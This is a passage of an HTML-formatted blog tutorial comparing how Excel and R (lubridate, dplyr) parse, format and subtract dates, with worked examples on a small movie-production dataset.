&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2023-05-16&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;numeric&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-01-18&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;2023-01-18&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-01-18&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Date&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="calculating-time-intervals"&gt;Calculating time intervals:&lt;/h3&gt;
&lt;p&gt;In Excel, you can use the &lt;code&gt;DATEDIF()&lt;/code&gt; function to calculate the time
difference between two dates in various units (years, months, etc.). For
example, if you want to calculate the number of days between two dates
in cells &lt;code&gt;A2&lt;/code&gt; and &lt;code&gt;B2&lt;/code&gt;, you can use &lt;code&gt;= DATEDIF(A2,B2,&amp;quot;d&amp;quot;)&lt;/code&gt;. In R, using
{lubridate}, you can calculate the difference in dates using the
&lt;code&gt;interval()&lt;/code&gt; function. Let’s calculate the difference between the two
dates specified (January 18, 2023 and May 16, 2023) in terms of days.&lt;/p&gt;
&lt;h4 id="excel"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The screenshot shows how you would use &lt;code&gt;= DATEDIF()&lt;/code&gt; in a cell to
calculate the interval between two dates.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/graphics/date_difference.png" alt="Screenshot of the data in an Excel spreadsheet. A2 contains 2023-01-18, B2 contains 2023-05-16 and C2 contains =DATEDIF(A2, B2,'d')" style="width: 400px; display: block; margin-left: auto; margin-right: auto; class:image-center"/&gt;
&lt;h4 id="r-1"&gt;R&lt;/h4&gt;
&lt;p&gt;The following code performs the same action in R, taking the start date
and end date and calculating the difference. We then convert the
difference to days using &lt;code&gt;as.numeric()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Attaching package: &amp;#39;lubridate&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## The following objects are masked from &amp;#39;package:base&amp;#39;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## date, intersect, setdiff, union&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;start_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-01-18&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;end_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-05-16&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;diff_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;interval&lt;/span&gt;(start_date, end_date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.duration&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;days&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;diff_date
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 118&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="formatting-dates"&gt;Formatting dates:&lt;/h3&gt;
&lt;p&gt;Dates in Excel can be formatted using the Format Cells feature. For
example, you can format a date as &lt;code&gt;dd-mmm-yyyy&lt;/code&gt; to display it as
&lt;code&gt;&amp;quot;16-May-2023&amp;quot;&lt;/code&gt;. In R, you can use the &lt;code&gt;format()&lt;/code&gt; function to format a
date in various ways.&lt;/p&gt;
&lt;h4 id="excel-1"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The following gif shows the manual process of formatting a date in Excel
using the Format&amp;gt;Format cells process.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif displaying the manual process of formatting a date in\nExcel." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/graphics/date_formatting.gif" width="1920"&gt;&lt;/p&gt;
&lt;h4 id="r-2"&gt;R&lt;/h4&gt;
&lt;p&gt;The following lines of code accomplish the same thing.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-05-16&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date_formatted &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;format&lt;/span&gt;(date, &lt;span style="color:#a5d6ff"&gt;&amp;#34;%d-%b-%Y&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date_formatted
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;16-Mai-2023&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Overall, Excel and R have different syntax and functions for handling
dates, but both can be used effectively for data analysis and
manipulation. It’s important to choose the tool that is best suited for
your specific needs and workflow.&lt;/p&gt;
&lt;h3 id="extracting-components-of-a-date"&gt;Extracting components of a date:&lt;/h3&gt;
&lt;p&gt;In R, you can extract different components of a date, such as the year,
month, or day, using various functions. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023-05-16&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(my_date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2023&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;month&lt;/span&gt;(my_date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;day&lt;/span&gt;(my_date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 16&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In Excel, you can extract different components of a date using the
&lt;code&gt;YEAR()&lt;/code&gt;, &lt;code&gt;MONTH()&lt;/code&gt;, and &lt;code&gt;DAY()&lt;/code&gt; functions.&lt;/p&gt;
&lt;h4 id="the-movies-data"&gt;The Movies Data&lt;/h4&gt;
&lt;p&gt;Let’s dive into more advanced examples of working with dates in R and
Excel. In our &lt;a href="https://www.jumpingrivers.com/blog/why-create-plots-in-r-part-2/" rel="external"&gt;previous
blog&lt;/a&gt;
series comparing Excel and R, we utilised a dataset called “movies data”
which consists of five columns: country, year, highest movie profit,
number of movies produced, and number of employees involved in the
production. We’ve added two new columns to our dataset called
&lt;code&gt;start_date&lt;/code&gt; and &lt;code&gt;end_date&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(readr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;blog-data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Rows: 6 Columns: 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ── Column specification ────────────────────────────────────────────────────────&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Delimiter: &amp;#34;,&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## chr (1): Country&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## dbl (4): Year, Highest_profit, Number_movies, no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## date (2): start_date, end_date&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ℹ Use `spec()` to retrieve the full column specification for this data.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ℹ Specify the column types or set `show_col_types = FALSE` to quiet this message.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(movies_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees start_date end_date &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;date&amp;gt; &amp;lt;date&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500 2011-01-16 2011-08-19&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 150 2 2000 2012-03-21 2012-09-21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 300 4 4000 2013-01-01 2012-11-12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 130 2 4020 2013-01-04 2013-05-04&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 South K… 2013 177 3 5300 2013-01-28 2013-09-22&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 America 2014 350 1 3150 2014-01-01 2014-12-12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s say we wanted to calculate the duration in days for each movie
production, and then find the average duration per country.&lt;/p&gt;
&lt;h4 id="r-3"&gt;R&lt;/h4&gt;
&lt;p&gt;In R, we can accomplish this by using the {lubridate} and
&lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;{dplyr}&lt;/a&gt; packages. The first portion of
this code takes the start and end dates of the movie production as
dates, and then calculates the time between the dates, converting it to
a numeric type. The second part then calculates the mean production time
as a summary statistic.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(lubridate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Attaching package: &amp;#39;dplyr&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## The following objects are masked from &amp;#39;package:stats&amp;#39;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## filter, lag&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## The following objects are masked from &amp;#39;package:base&amp;#39;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## intersect, setdiff, setequal, union&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(start_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(start_date),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; end_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_date&lt;/span&gt;(end_date),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(end_date &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; start_date))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;average_duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(average_duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(duration, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="in-excel"&gt;In Excel&lt;/h4&gt;
&lt;p&gt;In Excel, you would need to use formulas and functions such as
&lt;code&gt;DATEDIF()&lt;/code&gt; and &lt;code&gt;AVERAGEIF()&lt;/code&gt; to achieve similar results. Let’s take a
moment to refresh our memory on how the movie data is structured within
an Excel sheet.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/graphics/the_data.png" alt="Screenshot of the data in an Excel spreadsheet." style="width: 800px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;The following are the steps to accomplish the above task in Excel:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In cell H2, enter the formula to calculate the duration:&lt;/li&gt;
&lt;/ol&gt;
&lt;!-- --&gt;
&lt;pre&gt;&lt;code&gt;=G-F
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;
&lt;p&gt;Press Enter to calculate the duration for the first row.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Drag the formula down from cell H2 to fill the formula for the
remaining rows.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In cell I1, enter the formula to calculate the average duration per
country. Where country refers to the range of country values, and
duration refers to the range of duration values.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;!-- --&gt;
&lt;pre&gt;&lt;code&gt;=AVERAGEIF(country, A2, duration)
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="5"&gt;
&lt;li&gt;
&lt;p&gt;Press Enter to calculate the average duration for the first country.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Drag the formula down from cell I1 to fill the formula for the
remaining countries.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In this Excel approach, we used formulas and functions such as
subtraction and &lt;code&gt;AVERAGEIF()&lt;/code&gt; to perform the calculations. While it is
possible to achieve the desired results in Excel, the process involves
multiple steps and formulas, and it may become more complex as the
dataset grows. R however, simplifies the process with its built-in date
functions resulting in cleaner and more efficient code.&lt;/p&gt;
&lt;h3 id="advantages-of-using-r"&gt;Advantages of using R:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Flexibility: R allows us to work with date objects and apply
operations on them such as subtraction in order to calculate duration.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Vectorised operations: R allows us to apply calculations to the entire
column at once.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Data Manipulation: The {dplyr} data manipulation package in R makes it
easier to perform complex tasks on the entire dataset, such as
aggregating the data based on country and then determining the average
duration.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By utilising R’s ecosystem of packages such as the {lubridate} package
for handling dates in R, we can handle complex date calculations
efficiently and easily.&lt;/p&gt;
&lt;h4 id="using-dplyr-and-lubridate"&gt;Using {dplyr} and {lubridate}&lt;/h4&gt;
&lt;p&gt;Let’s say we wanted to find the average number of employees on set for
movies that were released in the year with the highest average profit.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Extract the year from the Start_date column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(start_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(start_date))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Calculate the average highest profit per movie for each year&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(start_year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(avg_profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(Highest_profit))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Determine the year with the highest average profit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;profit_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(avg_profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(avg_profit)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;(start_year)
